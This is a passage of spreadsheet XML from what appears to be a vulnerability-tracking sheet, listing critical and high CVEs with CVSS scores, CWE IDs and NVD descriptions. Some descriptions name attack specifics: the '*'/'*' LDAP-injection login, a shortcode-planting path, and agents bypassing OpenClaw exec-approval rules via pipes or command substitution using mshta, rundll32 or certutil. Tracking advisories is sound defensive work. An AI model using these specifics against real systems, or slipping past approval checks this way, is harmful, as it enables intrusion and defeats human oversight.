      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability for all PTZOptics cameras and the Firmware Upgrade Tool - Firmware Update modules. A missing authentication vulnerability in the firmware update mechanism of affected PTZOptics cameras allows an unauthenticated user to install modified firmware on the device without administrator credentials.
This vulnerability allows attackers to upload modified firmware to the device without admin credentials. This issue affects:
  *  Move 4K 12X before: 0.0.98
  *  Move 4K 20X before: 0.1.33
  *  Move 4K 30X before: 2.1.17
  *  Link 4K 12X before: 0.0.99
  *  Link 4K 20X before: 0.1.37
  *  Link 4K 30X before: 2.1.18
  *  Move SE 12X before: 9.1.66
  *  Move SE 20X before: 9.1.44
  *  Move SE 30X before: 9.1.46
  *  Studio 4K 12X before: 8.3.32
  *  Studio 4K 20X before: 8.3.32
  *  Studio SE 12X before: 8.3.32
  *  Studio SE 20X before: 8.3.32
  *  All Generation 2 cameras, including: PT12X-SDI-GY-G2, PT12X-SDI-WH-G2, PT12X-NDI-GY-G2, PT12X-NDI-WH-G2; PT12X-USB-GY-G2, PT12X-USB-WH-G2; PT20X-SDI-GY-G2, PT20X-SDI-WH-G2, PT20X-NDI-GY-G2, PT20X-NDI-WH-G2; PT20X-USB-GY-G2, PT20X-USB-WH-G2; PT30X-SDI-GY-G2, PT30X-SDI-WH-G2, PT30X-NDI-GY-G2, PT30X-NDI-WH-G2; PTVL-ZCAM, PTVL-NDI-ZCAM; PTEPTZ-ZCAM-G2, PTEPTZ-NDI-ZCAM-G2; PT12X-ZCAM, PT12X-NDI-ZCAM; PT20X-ZCAM, PT20X-NDI-ZCAM; Studio Pro - All versions
  *  Upgrade Tool - All versions</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75969</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77185</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass in sshd-core in Apache MINA SSHD versions 2.0.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 for a certain (presumed rare) way to implement an SSH server.
Apache MINA SSHD is a Java library for client- and server-side SSH. In the server part of the library, a mechanism to perform "asynchronous authentication" exists. A server implemented with Apache MINA SSHD must contain explicit code to make use of this feature. The implementation of this feature was flawed and could potentially lead to skipping checking the signature in public-key or hostbased authentication, or returning a wrong result.
Users are recommended to upgrade to Apache MINA SSHD 2.20.0 or 3.0.0-M6, which fix the logic error and which additionally forbid the use of this "asynchronous authentication" mechanism with the public-key or hostbased authentication schemes: if used, the SSH session will be closed and the server will log an entry indicating that asynchronous authentication may be used only with password or keyboard-interactive authentication.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77185</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87830</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-917</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>In the StAX streaming WS-SecurityPolicy validator, certain relative or unsupported XPath expressions can be converted into paths that never match the actual XML element path. A remote SOAP peer may therefore send a required element without the expected signature or encryption.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87830</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89238</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>WSS4J EncryptedHeader child confusion could promote an attacker-controlled plaintext element as the decrypted header, leading to incorrect confidentiality coverage and possible policy bypass.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89238</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92966</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>The The Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The payload is planted during the unauthenticated booking flow and triggered when the Customer Cabinet block rendered by render_customer_dashboard() outputs the stored name into the content stream, where WordPress core's do_shortcode filter at priority 11 re-parses and executes it.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92966</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94052</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>A missing check in LdapPasswordAuthenticator in component sshd-ldap in Apache MINA SSHD versions 1.2.0 to 2.19.0 or 3.0.0-M1 to 3.0.0-M5 bypassed authentication checks.
Apache MINA SSHD is a Java library for client-side and server-side SSH. The optional sshd-ldap component provides support for integrating password and publickey authentication on the server side with an LDAP server.
sshd-ldap is an optional component. SSH servers implemented with Apache MINA SSHD are affected only if they use sshd-ldap and do configure an LdapPasswordAuthenticator to be used for password authentication. Normal password authentication via the built-in mechanisms in sshd-core is _not_ affected by this vulnerability, which concerns only LdapPasswordAuthenticator.
Users are recommended to upgrade affected applications to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94052</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94053</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-305, CWE-90</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass via LDAP injection in component sshd-ldap in Apache MINA SSHD versions 1.2.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5.
Apache MINA SSHD is a Java library for client-side and server-side SSH. 
The optional sshd-ldap component provides support for integrating 
password and publickey authentication on the server side with an LDAP 
server.
sshd-ldap is an optional component. SSH servers implemented with Apache 
MINA SSHD are affected only if they use sshd-ldap and do configure it to be used for password of public key authentication.
Other Apache MINA SSHD servers are not affected.
Lack of escaping LDAP filter metacharacters enabled successful authentication with username "*" and password "*".
Users are recommended to upgrade affected applications to version 2.20.0 or 3.0.0-M6, which fix this issue by properly escaping filter parameters according to RFC 4515.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94053</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97196</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Unsafe Equivalence in Input vulnerability in Liquid Web / StellarWP GiveWP allows Authentication Bypass.
This issue affects GiveWP: from n/a through 4.16.9.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97196</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55176</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, two authentication helpers in /app/server.js — verifyContainerAuth() and authenticateWorkspaceHttp() — accept the global CONTAINER_SHARED_SECRET as a bearer token without verifying which workspace the caller belongs to. Because that secret is set identically on every container in the Fly app and is reachable from the user-facing process environment inside each workspace, any tenant can use it to authenticate to any other tenant's workspace API. The result is cross-workspace read, write, and destructive-restore primitives reachable from any paying customer's shell. The existing per-workspace token check (workspaceTokenMatches) protects the user-facing per-workspace token path, but the shared-secret bearer path bypasses it entirely. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55176</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94389</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in AcyMailing SMTP Newsletter &lt;= 11.0.5 versions.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94389</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100277</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 account takeover was possible by replaying a notification signature</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100277</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13313</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>An Active Debug Code vulnerability in certain ASUS router models allows a remote authenticated user, via a crafted HTTP request, to bypass security mechanisms and enable the Telnet service, thereby executing arbitrary commands with root privileges and potentially affecting other devices connected to the router.
Refer to the ' Security Update for ASUS Router Firmware ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13313</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100253</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 sandbox escape leading to code execution was possible via the versioned settings Kotlin DSL</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100253</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100254</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 authenticated users could execute commands on Windows servers via CRLF injection in Pipeline Git connection settings</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100254</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101880</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</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2026-09-30</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incorrect authorization vulnerability in the system.run exec-approval policy where ExecShellWrapperParser fails to split commands on pipe operators or extract command substitutions. Connected gateways or agents can bypass approval rules by placing denied commands behind allowed prefixes using pipe operators or command substitution syntax, achieving arbitrary command execution on Windows hosts.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101880</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101882</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</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2026-09-30</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete validation vulnerability in system.execApprovals.set that accepts wildcard-executable rules and abusable system binaries like mshta, rundll32, and certutil. Remote callers can add broad allow rules to execute arbitrary commands on the Windows host through system.run without operator checks or user prompts.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101882</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
